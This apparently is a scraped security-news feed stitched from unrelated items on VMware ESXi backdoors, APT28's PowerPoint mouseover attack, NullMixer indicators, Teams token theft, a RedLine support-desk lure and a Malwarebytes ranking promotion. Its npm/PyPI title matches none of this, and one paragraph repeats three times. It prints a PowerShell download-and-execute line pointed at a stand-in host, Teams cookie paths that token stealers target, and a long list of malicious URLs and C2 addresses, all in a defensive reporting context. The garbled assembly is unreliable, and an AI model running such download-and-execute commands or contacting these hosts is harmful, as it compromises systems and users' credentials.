This Week in Malware - 135 Packages Target npm and PyPI Registries

This week in malware, we discovered and analyzed 135 packages flagged as malicious, suspicious, or dependency confusion attacks in npm and PyPI registries.

The post This Week in Malware – 135 Packages Target npm and PyPI Registries appeared first on Security Boulevard.

Over the past few years, threat actors have adapted their tactics to focus more on specific operating systems and operating environments that carry the most sensitive data, or where an attack can have the greatest effect. By increasing the development and use of specialized techniques, cyber criminals increase their opportunities to steal intellectual property, ransom and extort their victims, and extort victims’ customers. Malicious actors gain access to these target environments through a variety of methods, often focused on operational security weaknesses in credential management, network security practices, and unhardened operating environments.

Mandiant has brought to our attention a new variant of malware targeting vSphere. This malware differs in that it supports remaining both persistent and covert, which is consistent with the goals of larger threat actors and APT groups who target strategic institutions with the intention of dwelling undetected for some time. This contrasts with other threat actors and their toolkits who conduct “noisy,” financially-motivated attacks using ransomware.

We would like to thank Mandiant for sharing their findings. You can find much more information about specific detection and mitigation techniques for these issues, questions & answers, as well as preventative techniques for strengthening operational security, secure configuration practices, and defense-in-depth in our document “Protecting vSphere From Specialized Malware” at core.vmware.com.

The post Protecting vSphere From Specialized Malware appeared first on VMware Security Blog.

The group continued to use the LookBack backdoor, but also several new types of malware

google.jpg

Threat actors have been found deploying never-before-seen post-compromise implants in VMware’s virtualization software to seize control of infected systems and evade detection.
Google’s Mandiant threat intelligence division referred to it as a “novel malware ecosystem” that impacts VMware ESXi, Linux vCenter servers, and Windows virtual machines, allowing attackers to maintain persistent access

windows-malware.jpg

An espionage-focused threat actor has been observed using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments.
Broadcom’s Symantec Threat Hunter Team attributed the updated tooling to a hacking group it tracks under the name Witchetty, which is also known as LookingFrog, a subgroup operating under the TA410

vmware-1600-hns.jpg

Unknown attackers wielding novel specialized malware have managed to compromise VMware ESXi hypervisors and guest Linux and Windows virtual machines, Mandiant threat analysts have discovered. They named the malware VirtualPITA (ESXi & Linux), VirtualPIE (ESXi), and VirtualGATE (Windows), and shared detection and hardening advice. The malware and techniques used by the attackers VirtualPITA and VirtualPIE are backdoors, which the attackers deliver by using malicious vSphere Installation Bundles (VIBs). VirtualGATE is a utility program that incorporates … More

The post Attackers use novel technique, malware to compromise hypervisors and virtual machines appeared first on Help Net Security.

Threat-detection-tablet-e1504618057258.j

Undocumented malware only makes up a small proportion of files, yet it presents a high risk of infection. Sandboxing and analyzing everything in order to eliminate risk, however, has a major impact on performance. To address this Cyren has produced Hybrid Analyzer. Using emulation — effectively automatically reverse engineering the code contained in a file — this new offering operates 100 times faster than a malware sandbox and between five and 20 times faster than alternative file analysis solutions. “We’ve created a product that’s based on our AV technology that produces detailed file analysis,” says Pete Starr, director of sales… [Continue Reading]

hacked.jpg

A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts.
“The payload discovered is a leaked version of a Cobalt Strike beacon,” Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday.
“The beacon configuration contains

linkedin.jpg?auto=webp&fit=crop&height=6

Tech pros need to double-check job offers via LinkedIn, Microsoft warns.

Researchers from Mandiant have discovered a novel malware persistence technique within VMware ESXi Hypervisors.

Mandiant detailed a novel technique used by malware authors to achieve administrative access within VMware ESXi Hypervisors and take over vCenter servers and virtual machines for Windows and Linux to perform the following actions:

Send commands to the hypervisor that will be routed to the guest VM for executionTransfer files between the ESXi hypervisor and guest machines running beneath itTamper with logging services on the hypervisorExecute arbitrary commands from one guest VM to another guest VM running on the same hypervisor.

The highly targeted and evasive nature of this attack, lead the experts into believe that the attack was carried out by for cyberespionage purposed by a China linked actor tracked as UNC3886. 

In the attack investigated by Mandiant, threat actors relied on malicious vSphere Installation Bundles (“VIBs”) to install two backdoors on the ESXi hypervisors, tracked as VIRTUALPITA and VIRTUALPIE. VIBs are collections of files that are designed to manage virtual systems, they can be used to create startup tasks, custom firewall rules, or deploy custom binaries upon the restart of an ESXi machine.

“This malware ecosystem was initially detected during an intrusion investigation when Mandiant identified attacker commands sourced from the legitimate VMware Tools process, vmtoolsd.exe, on a Windows virtual machine hosted on a VMware ESXi hypervisor.” reads the report published by Mandiant. “Mandiant analyzed the boot profile for the ESXi hypervisors and identified a never-before-seen technique in which a threat actor leveraged malicious vSphere Installation Bundles (“VIBs”) to install multiple backdoors on the ESXi hypervisors. We call these backdoors VIRTUALPITA and VIRTUALPIE.”

VMware ESXi Hypervisors

The experts pointed out that the attacker needs admin-level privileges to the ESXi hypervisor before they can deploy malware. The experts are not aware of zero-day exploits being used to gain initial access or deploy the malicious VIBs.

VIBs are composed of:

An XML descriptor fileA “VIB payload” (.vgz archive)A signature file – A digital signature used to verify the host acceptance level of a VIB

The XML Descriptor File is a config which contains references to the following:

The payload to be installedVIB metadata, such as the name and install dateThe signature file that belongs to the VIB

Mandiant researchers discovered that attackers were able to modify the acceptance level in the XML descriptor of the VBI from ‘community’ to ‘partner’ to make it appear to have been created by a trusted entity.

“While the acceptance-level field was modified in the Descriptor XML by the attacker, the ESXi system still did not allow for a falsified VIB file to be installed below the minimal set acceptance level. To circumvent this, the attacker abused the –force flag to install malicious CommunitySupported VIBs.” continues the report.

Attackers used this technique to install the VirtualPita and VirtualPie backdoor on the compromised ESXi machine

VIRTUALPITA is a 64-bit passive backdoor that creates a listener on a hardcoded port number on a VMware ESXi server, the malware supports arbitrary command execution. VIRTUALPIE is a lightweight Python backdoor that supports arbitrary command line execution, file transfer capabilities, and reverse shell capabilities. 

Researchers also discovered a unique malware sample, tracked as VirtualGate, which includes a dropper and a payload. The malicious code was hosted by the infected hypervisors.

“While we noted the technique used by UNC3886 requires a deeper level of understanding of the ESXi operating system and VMWare’s virtualization platform, we anticipate a variety of other threat actors will use the information outlined in this research to begin building out similar capabilities.” concludes the report. “Mandiant recommends organizations using ESXi and the VMware infrastructure suite follow the hardening steps outlined in this blog post to minimize the attack surface of ESXi hosts.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, VMware ESXi)

The post Experts uncovered novel Malware persistence within VMware ESXi Hypervisors appeared first on Security Affairs.

ransom_g1320502708.jpg

flag.png

Original release date: September 29, 2022

VMWare has released Protecting vSphere From Specialized Malware, addressing malware artifacts known as VirtualPITA (ESXi & Linux), VirtualPIE (ESXi), and VirtualGATE (Windows), which are used to exploit and gain persistent access to instances of ESXi.

CISA urges organizations employing VMWare ESXi to review the following for more information and to apply recommended mitigations and threat hunting guidance:

VMware: Protecting vSphere From Specialized Malware
VMware: Knowledge Base 89619 – Mitigation and Threat Hunting Guidance for Unsigned vSphere Installation Bundles (VIBs) in ESXi (including a script to audit ESXi hosts)
VMWare: vSphere Security Configuration Guides (baseline hardening guidance for VMware vSphere)

This product is provided subject to this Notification and this Privacy & Use policy.

tr-new-chaos-malware.jpeg?x95853

A new malware named Chaos raises concerns as it spreads on multiple architectures and operating systems.

The post New Chaos malware spreads over multiple architectures appeared first on TechRepublic.

security_a270068402.jpg

A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity company Zscaler.

To read this article in full, please click here

A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity company Zscaler.

To read this article in full, please click here

A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity company Zscaler.

To read this article in full, please click here

security_a385093447.jpg

Researchers at Cluster25 have published research about exploit code that’s triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft’s Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to the Russian APT28 group, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren’t a target isn’t a good defense strategy.

Malicious mouseover

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering over a mouse can be used to trigger:

SyncAppvPublishingServer.exe “n;(New-Object Net.WebClient).DownloadString(‘http://example.org/malice.ps1’) | IEX”

Which downloads a script—malice.ps1 in my example—which can be used to execute malicious code on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:ProgramDatalmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

Mitigation

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office’s Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on File > Options, then Trust Center > Trust Center Settings > Protected View to view the active settings.

Malwarebytes

Malwarebytes users are protected against this attack.

Our web protection module blocks the One Drive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.

Malwarebytes blocks Imapi2.dll

The-Anatomy-of-Wiper-Malware-Part-2-Thir

Originally published by CrowdStrike here. Written by Ioan Iacob and Iulian Madalin Ionita, CrowdStrike. In Part 1 of this four-part blog series examining wiper malware, we introduced the topic of wipers, reviewed their recent history and presented common adversary techniques that leverage wipers to destroy system data. In Part 2, an Endpoint Protection Content Research Team discusses how threat actors have used legitimate third-party drivers to bypass the visibility and detection capabilitie…

A new dropper named “NullMixer” is spreading multiple malware families, including some seen regularly by the RH-ISAC community.

Context

On September 26, 2022, researchers at SecureList reported a new dropper they named “NullMixer” which spreads multiple malware families via malicious websites impersonating legitimate software downloads. According to SecureList, in addition to multiple malware families, NullMixer also drops a wide variety of malicious binaries including backdoors, bankers, downloaders, and spyware.

Community Impact

According to SecureList, the malware families being spread by NullMixer:

SmokeLoader
RedLine Stealer
PseudoManuscrypt
ColdStealer
FormatLoader
CsdiMonetize
DanaBot
Disbuk
Fabookie
GCleaner
LgoogLoader
PrivateLoader
Racealer
Satacom
SgnitLoader
ShortLoader
Vidar

Several of these malware are familiar to the retail, hospitality, and travel communities. As such, organizations are encouraged to maintain awareness around the tactics, techniques, and procedures used by NullMixer to drop malware, as well as ingest the indicators of compromise (IOCs) provided here.

Technical Details

SecureList researchers provided the following infection chain for NullMixer, which is based on user execution (MITRE Technique T1204):

The user visits a website to download cracked software, keygens or activators. The campaign appears to target anyone looking to download cracked software, and uses SEO techniques to make these malicious sites more prominent at the top of search engine results.
The user clicks on the download link for the desired software.
The link redirects the user to another malicious website.
The malicious website redirects the user to a third-party IP address webpage.
The webpage instructs the user to download a password-protected ZIP file from a file sharing website.
The user extracts the archived file with the password.
The user runs the installer and executes the malware.

IOCs

Securelist researchers provided the following IOCs:

Indicator
Type
Notes

hxxps://azilominehostz[.]xyz/
Domain
Malicious URL

hxxps://patchlinks[.]com/
Domain
Malicious URL

hxxp://137[.]184[.]159[.]42/
Domain
Malicious URL

hxxp://185[.]186[.]142[.]166/wallet[.]exe
Domain
Malicious URL

hxxps://dll1[.]stdcdn[.]com/
Domain
Malicious URL

hxxp://tg8[.]cllgxx[.]com/hp8/g1/yrpp1047[.]exe
Domain
Malicious URL

hxxp://eurekabike[.]com/pmzero/design/img/LightCleaner9252839[.]exe
Domain
Malicious URL

hxxps://i[.]xyzgamei[.]com/gamexyz/2201/random[.]exe
Domain
Malicious URL

hxxp://www[.]sxhxrj[.]com/askhelp35/askinstall35[.]exe
Domain
Malicious URL

hxxps://presstheme[.]me/
Domain
Malicious URL

hxxp://remviagra[.]com/pub1[.]exe
Domain
Malicious URL

hxxp://privacy-tools-for-you-782[.]com/downloads/toolspab2[.]exe
Domain
Malicious URL

hxxps://cdn[.]discordapp[.]com/attachments/917889480646590537/935966171835031612/Cube_WW6[.]exe
Domain
Malicious URL

hxxp://onlinehueplet[.]com/77_1[.]exe
Domain
Malicious URL

hxxps://cdn[.]discordapp[.]com/attachments/934006169125679147/943432754161410108/WW19[.]exe
Domain
Malicious URL

hxxp://privacy-tools-for-you-791[.]com/downloads/toolspab1[.]exe
Domain
Malicious URL

hxxps://cdn[.]discordapp[.]com/attachments/917889480646590537/943130993404018709/Fixtools[.]exe
Domain
Malicious URL

hxxp://stylesheet[.]faseaegasdfase[.]com/hp8/g1/rtst1051[.]exe
Domain
Malicious URL

hxxp://104[.]168[.]215[.]231/kde[.]exe
Domain
Malicious URL

hxxp://careerguide4u[.]online/wp-content/plugins/google-analytics-for-wordpress/BlackCleanerSetp521234[.]exe
Domain
Malicious URL

hxxps://i[.]xyzgamei[.]com/gamexyz/2203/random[.]exe
Domain
Malicious URL

hххp://zenitsu[.]s3[.]pl-waw[.]scw[.]cloud/pub-summoning/poweroff[.]exe
Domain
Malicious URL

hххps://tengenuzui[.]s3[.]pl-waw[.]scw[.]cloud/makio/cpm_pr_vp46up4d6j_[.]exe
Domain
Malicious URL

hххps://tengenuzui[.]s3[.]pl-waw[.]scw[.]cloud/makio/updto_bgn64wau5x_date[.]exe
Domain
Malicious URL

hххps://tengenuzui[.]s3[.]pl-waw[.]scw[.]cloud/makio/handler_wbba4vzm89rxskhs[.]exe
Domain
Malicious URL

hxxps://i[.]xyzgamei[.]com/gamexyz/25/random[.]exe
Domain
Malicious URL

hххps://v[.]xyzgamev[.]com/25[.]html
Domain
Malicious URL

hххps://v[.]xyzgamev[.]com/login[.]html
Domain
Malicious URL

hxxp://jackytpload[.]su/campaign6/autosubplayer[.]exe
Domain
Malicious URL

hxxps://gc-distribution[.]biz/pub[.]php?pub=five
Domain
Malicious URL

hxxp://www[.]sxhxrj[.]com/askhelp42/askinstall42[.]exe
Domain
Malicious URL

hxxps://flexnetinformatica[.]com[.]br/wp-content/plugins/elementor/assets/LightCleaner2132113[.]exe
Domain
Malicious URL

hxxp://stylesheet[.]faseaegasdfase[.]com/hp8/g1/siww1053[.]exe
Domain
Malicious URL

hxxps://source3[.]boys4dayz[.]com/installer[.]exe
Domain
Malicious URL

hxxps://signaturebusinesspark[.]com/360/fw3[.]exe
Domain
Malicious URL

hxxps://signaturebusinesspark[.]com/360/fw4[.]exe
Domain
Malicious URL

hxxps://signaturebusinesspark[.]com/360/fw6[.]exe
Domain
Malicious URL

hxxps://cdn[.]discordapp[.]com/attachments/937783814208491553/937784072967692368/SecondFile[.]exe
Domain
Malicious URL

hххps://v[.]xyzgamev[.]com/23[.]html
Domain
Malicious URL

hххps://v[.]xyzgamev[.]com/login[.]html
Domain
Malicious URL

178.62.113[.]205/runtermo
Domain
Malware C2

185.163.204[.]22/runtermo
Domain
Malware C2

185.163.45[.]70/runtermo
Domain
Malware C2

185.186.142[.]166
Domain
Malware C2

185.215.113[.]10
Domain
Malware C2

185.38.142[.]132
Domain
Malware C2

212.193.30[.]21/base/api/
Domain
Malware C2

212.193.30[.]45/proxies.txt
Domain
Malware C2

5.9.224[.]217
Domain
Malware C2

92.255.57[.]115
Domain
Malware C2

ads-memory[.]biz
Domain
Malware C2

all-mobile-pa1ments.com[.]mx
Domain
Malware C2

all-smart-green[.]com
Domain
Malware C2

am1420wbec[.]com/upload/
Domain
Malware C2

appwebstat[.]biz
Domain
Malware C2

banhamm[.]com
Domain
Malware C2

buy-fantasy-fo0tball.com[.]sg
Domain
Malware C2

buy-fantasy-gmes.com[.]sg
Domain
Malware C2

connectini[.]net
Domain
Malware C2

dll1.stdcdn[.]com
Domain
Malware C2

dollybuster[.]at/upload/
Domain
Malware C2

egsagl[.]com/upload/
Domain
Malware C2

enter-me[.]xyz
Domain
Malware C2

fennsports[.]com/upload/
Domain
Malware C2

file-coin-host-12[.]com
Domain
Malware C2

ginta[.]link
Domain
Malware C2

hhiuew33[.]com/check/safe
Domain
Malware C2

host-data-coin-11[.]com
Domain
Malware C2

islamic-city[.]com/upload/
Domain
Malware C2

mordo[.]ru/upload/
Domain
Malware C2

nahbleiben[.]at/upload/
Domain
Malware C2

noblecreativeaz[.]com/upload/
Domain
Malware C2

one-wedding-film[.]com
Domain
Malware C2

piratia-life[.]ru/upload/
Domain
Malware C2

presstheme[.]me
Domain
Malware C2

real-enter-solutions[.]xyz
Domain
Malware C2

recmaster[.]ru/upload/
Domain
Malware C2

remik-franchise[.]ru/upload/
Domain
Malware C2

reoseio[.]com
Domain
Malware C2

signaturebusinesspark[.]com
Domain
Malware C2

sovels[.]ru/upload/
Domain
Malware C2

spaldingcompanies[.]com/upload/
Domain
Malware C2

toa.mygametoa[.]com
Domain
Malware C2

topexpertshop[.]com
Domain
Malware C2

topniemannpicksh0p[.]cc
Domain
Malware C2

tvqaq[.]cn/upload/
Domain
Malware C2

whsddzs[.]com/Home/Index/djksye
Domain
Malware C2

06B31367D65A411B1F2A7B3091FB31D4
Hash
Coldstealer

584B186152A16161E502816BF990747C
Hash
Coldstealer

C41A85123AF144790520F502FE190110
Hash
Coldstealer

5B14369C347439BECACAA0883C07F17B
Hash
CsdiMonetize

7E58613DDB2FDD10EED17BBCE5B3E0A9
Hash
CsdiMonetize

883403C940B477CEE083EFEEA8C252C6
Hash
CsdiMonetize

98F0556A846F223352DA516AF66FA1A0
Hash
CsdiMonetize

CEADA3798FD16FAC13F053D0C6F4D198
Hash
CsdiMonetize

D91325640F392D33409B8F1B2315B97C
Hash
DanaBot

3739256794EBF9BA8C6597A4687C8799
Hash
Disbuk

FBD3940D1AD28166D8539EAE23D44D5B
Hash
Disbuk

AAEFF1F8E7BD3A81C69C472BCD211A7B
Hash
Downloader.Bitser

E65BF2D56FCAA18C1A8D0D481072DC62
Hash
Downloader.INNO

33F7383C2EB9B20E11E6A149AA62DEA4
Hash
Fabookie

79400B1FD740D9CB7EC7C2C2E9A7D618
Hash
Fabookie

B8ECEC542A07067A193637269973C2E8
Hash
FormatLoader

42100BAF34C4B1B0E89F1C2EF94CF8F8
Hash
GCleaner

4D75DEA49F6BD60F725FAE9C28CD0960
Hash
Generic.ClipBanker

CC722FD0BD387CF472350DC2DD7DDD1E
Hash
LgoogLoader

4008D7F17A08EFD3FBD18E4E1BA29E00
Hash
LgoogLoader

B2A2F85B4201446B23A250F68051B4DC
Hash
LgoogLoader

4EC312D77817D8FB90403FF87B88D5E3
Hash
NullMixer

12DBC75B071077042C097AFD59B2137F
Hash
NullMixer

F94BF1734F34665A65A835CC04A4AD95
Hash
NullMixer

362592241E15293C68D0F24468723BBB
Hash
PrivateLoader

7875AAB3E23F885DF12FF62D9EF5DB50
Hash
PrivateLoader

B0448525C5A00135BB5B658CC6745574
Hash
PseudoManuscrypt

D5C1C44D19D8D6E8C0F739CAB439E45E
Hash
PseudoManuscrypt

4FEBA8683DAA18545E9F9408E4CD07BD
Hash
Racealer

446119332738133D3ECD2D00EBE5D0EC
Hash
RedLine

5994DE41D8B4ED3BBB4F870A33CB839A
Hash
RedLine

9F8800BF866E944EFB2034EC56ED574E
Hash
RedLine

AC458CABFED224353545707DF966A2BA
Hash
RedLine

AF817AAD791628143019FFDE530D0EF7
Hash
RedLine

2086E25FB651F0A8D713024DE2168B9B
Hash
Satacom

B2620FFE40493FDF9E771BFF3BDCBC44
Hash
SgnitLoader

4DD3F638D4C370ABEB3EBF59CAD8ED2F
Hash
SgnitLoader

CE54B9287C3E4B5733035D0BE085D989
Hash
ShortLoader

9F1EAA0FF990913F7D4DFD31841DE47A
Hash
SmokeLoader

639DE55E338BFCEA8DAAE727141AF3D1
Hash
Vidar

20220925-092057.png

When you lookup a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

G2 has released their Fall 2022 reports, ranking Malwarebytes as the leader across a number of endpoint protection categories. 

Based on factual customer reviews, Malwarebytes has been ranked #1 over top EDR vendors for endpoint malware and antivirus protection, detection and remediation of web-based threats, product usability, and more. These results continue Malwarebytes’ top ranking by G2, reinforcing Malwarebytes leadership in the endpoint security platform market. 

Summary Report

Malwarebytes has ranked #1 for 4 reports OVERALL across all vendors and market segments

Grid

Results Index

Implementation Index

Usability Index

Malwarebytes has ranked #1 for 5 Mid-Market reports

Results Index

Relationship Index

Grid report (main report)

Implementation Index

Usability Index

Malwarebytes has ranked #1 for 1 Small Business reports

Grid report (main report)

Most rapid time to value (TTV)

Small- to medium-sized business (SMB) security teams need a solution that is quick to deploy, easy to set-up, and uncomplicated. Malwarebytes is that solution.

Ranked #1 in G2 Crowd’s Fall 2022 Implementation Index report, Malwarebytes’ endpoint protection suite provides the most rapid time to value (TTV) of all competitive solutions in the market today.

urNKrKAXjjPm45PrWqENkbFgR9haUZVJIdEZyqbW
Best ROI

Looking for endpoint security that will provide maximum return on your investment? Malwarebytes is the answer. 

Ranked #1 in G2 Crowd’s Fall 2022 Results Index report, Malwarebytes provides the best estimated ROI of all endpoint protection suites based on our unique combination of rapid time to go live and time to ROI.

easset_upload_file882_236609_e.png

Malwarebytes ranked #1 for 4 reports OVERALL across all vendors and market segments
Grid® Report for Endpoint Protection Suites

Largest Market Presence and received the highest Satisfaction score among products in Endpoint Protection Suites. 98% of users rated it 4 or 5 stars.

easset_upload_file644_236609_e.png

3AAd_-hlRwLz2mS9HXdKy0c8Pc84wiGMPf33v_-s

Europe Regional Grid® Report for Endpoint Protection Suites

Market Presence and received the highest Satisfaction score among products in Endpoint Protection Suites. 98 percent of users rated it 4 or 5 stars.

easset_upload_file644_236609_e.png

Implementation Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of setup,” “Implementation time,” and “User adoption.”

Earned badge for highest implementation score.

easset_upload_file57784_236609_e.png

Results Index

Contributing factors: Ratings for “Likely to recommend,” “Meets requirements,” and “Estimated ROI.”

Earned badge for highest overall Results score.

Usability Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of admin,” “Ease of use,” “Meets requirements.”

Earned badges for highest overall Usability score and highest ease of use rating. 

easset_upload_file73643_236609_e.png

Malwarebytes ranked #1 for 5 Mid-Market reports

Badges are awarded to products that receive the highest overall ratings along certain categories. For example, the Highest Quality of Support badge goes to the product with the highest overall quality of support score.

Mid-Market Results Index for Endpoint Protection Suites

Contributing factors: Ratings for “Likely to recommend,” “Meets requirements,” and “Estimated ROI.”

Earned badges for highest overall Results score and highest likehood to recommend score.easset_upload_file13817_236609_e.png

Mid-Market Relationship Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of business,” “Likely to recommend,” and “Quality of support.”

Earned badge for highest overall best relationship score.

easset_upload_file85020_236609_e.png

Mid-Market Grid® Report for Endpoint Protection Suites

Malwarebytes has the largest Market Presence and received the highest Satisfaction score among products in Endpoint Protection Suites. 99 percent of users rated it 4 or 5 stars.

easset_upload_file644_236609_e.png

easset_upload_file68007_236609_e.png

Mid-Market Implementation Index for Endpoint Protection Suites

Rated for “Ease of setup,” “Implementation time,” and “User adoption.”

Mid-Market Usability Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of admin,” “Ease of use,” “Meets requirements.”

Earned badge for highest most implementable score.

easset_upload_file57784_236609_e.png

Malwarebytes ranked #1 for 1 Small Business report
Small-Business Grid® Report for Endpoint Protection Suites

Malwarebytes has the largest Market Presence and received the highest satisfaction score among products in Endpoint Protection Suites. 98 percent of users rated it 4 or 5 stars.

easset_upload_file644_236609_e.png

easset_upload_file68801_236609_e.png

Easy, effective, and efficient cyber protection validated by real users

Malwarebytes is committed to delivering a stellar experience for our users.

Customer reviews are critical to ensuring that endpoint security solutions perform well where it counts, whether that’s ease-of-use, implementation, or overall satisfaction. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Malwarebytes receives highest rankings in recent third-party tests

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%MicrosoftTeamsCookies
%AppData%MicrosoftTeamsLocal Storageleveldb

After reading this, I was curious to see if this is already exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit! A DLL was uploaded and contained one of the two strings above.

The file was called “RwWork.dll” (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file looks indeed for Teams cookies but even more:

As you can see, many files related to cookies are searched. The malware is from the Floxif family…

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

On September 20, 2022, the official Twitter account for 2K Support tweeted an important message from the Customer Support team.

The tweet said an unauthorized party illegally accessed the credentials of one of the vendors of the helpdesk platform. The attacker then used that access to send out communications that contained a malicious link.

The email

There is some confusion about the email, which is clear from reading the replies and tweets on 2K support. From what we managed to put together based on the tweets and what little information 2K provided, the first email looked similar to this one:

2k support email type 12K Support request

In some cases, these were followed by a second email that looked similar to this one.

2k support email type 2

Email with a direct link to the malware

At the point of writing, clicking the link in the first mail will take you to a login screen for the 2K games support site and the link in the second email takes you to a Zendesk page which tells you that this “help center” no longer exists.

The malware

In the case of the first email, visitors were taken to a support ticket that contained a link to the same file (2K+Launcher.zip). In the case of the second email, the email itself container a direct link to the malware.

The zip file contains an executable called 2K Launcher.exe. It does display a 2K logo, but if you look at the Properties, you will notice the original filename is Plumy.exe. Both the Description and the Product name have it listed as 5K Player.

File properties 2K launcher.exeFile properties of 2K Launcher.exe

The malware turns out to be RedLine infostealer. RedLine specializes in stealing banking information from a system’s clipboard. It also attempts to steal other data from the affected system, like browser history, cookies, and saved browser passwords.

Info stealers like this are usually delivered to an affected system when users download them under false pretenses, often disguised as popular software or cracks.

Supply chain

Breaking into the supply chain like this can give an attacker access to a large amount of potential victims. Most of the customers in this case had open tickets, so they weren’t surprised to receive an email from the Support desk. And it’s not uncommon for Support desks to send out files for system analysis, which can help support to pinpoint the problems customers might have with the installation of their product or any other hardware or software conflicts.

Mitigation

Anyone that has downloaded the file must now do a full system scan to remove any malware.

If you have executed the file, this means that information from and about your system may have been sent to the attacker.

What can you do to limit the dangers of stolen information as much as possible?

Change the passwords that might have been stolen for every website you can remember logging into. Depending on how your browser stores the passwords, you may have to do the same for every password that the browser remembers for you. All modern web browsers come with a built-in password manager that offers to store your login credentials, but the degrees of security encryption are very diffferent.
If your email account has been compromised, change that password first as other credentials may be sent to you by mail and still end up in the wrong hands. Some online shops even send you a password in plain-text.
Keep a close eye on your banking and eMoney accounts. Use the activity alerts that some banks offer.
Keep tabs on your posts in social media. It may look silly to check what you have supposedly posted yourself, but imagine someone else doing it for you.

Extra precautions

Enable 2FA wherever possible.
Do not re-use passwords, and consider a password manager to generate and remember all your passwords for you.

Malwarebytes customers were protected against this attack because the Premium version blocked the C2 server that the 2K Launcher.exe contacts when it is executed.

Malwarebytes blocks the IP 103.195.100.184Malwarebytes blocks the connection to the C2 server

cover-atlassian-confluence-vulnerability

Users are advised to patch immediately: We found exploit samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining.

Originally published by CrowdStrike here. Written by Ioan Iacob and Iulian Madalin Ionita, CrowdStrike. This blog post is the first in a four-part series in which an Endpoint Protection Content Research Team will dive into various wipers discovered by the security community over the past 10 years. The goal is to review in depth the various techniques employed by wipers that target the Windows operating system.BackgroundA wiper is a type of malware with a single purpose: to erase user data bey…

Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Multiple security firms have reported that the Sandworm APT continues to target Ukraine with multiple means, including custom malware and botnet like Cyclops Blink.

Sandworm (aka BlackEnergy and TeleBots) has been active since 2000, it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).

The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions worth of damage.

In April, Sandworm targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper.

The APT hacking group is believed to have been behind numerous attacks this year, including an attack on Ukrainian energy infrastructure and the deployment of a persistent botnet called “Cyclops Blink” dismantled by the US government in April.

From August 2022, Recorded Future researchers observed a rise in command and control (C2) infrastructure used by Sandworm (tracked by Ukraine’s CERT-UA as UAC-0113).

The researchers observed C2 infrastructure relying on dynamic DNS domains masquerading as Ukrainian telecommunication service providers.

